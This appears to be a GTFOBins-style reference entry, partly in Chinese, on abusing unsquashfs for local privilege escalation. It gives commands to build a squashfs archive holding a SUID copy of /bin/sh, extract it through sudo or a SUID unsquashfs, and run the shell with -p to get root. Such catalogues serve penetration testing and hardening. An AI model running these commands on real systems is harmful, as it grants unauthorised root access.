.. / unsquashfs

`unsquashfs` preserve the SUID bit when extracting the file system. Prepare an archive beforehand with the following commands as root: ``` cp /bin/sh . chmod +s sh mksquashfs sh shell ``` Extract it on the target, then run the SUID shell as usual (omitting the `-p` where appropriate).

sudo

如果二进制文件被 sudo 允许以超级用户身份运行，可能被用于访问文件系统、提升或维持特权访问。

sudo unsquashfs shell
./squashfs-root/sh -p

suid

suid是一种授予文件的权限类型，它允许用户使用者以文件所有者的权限来执行文件。

./unsquashfs shell
./squashfs-root/sh -p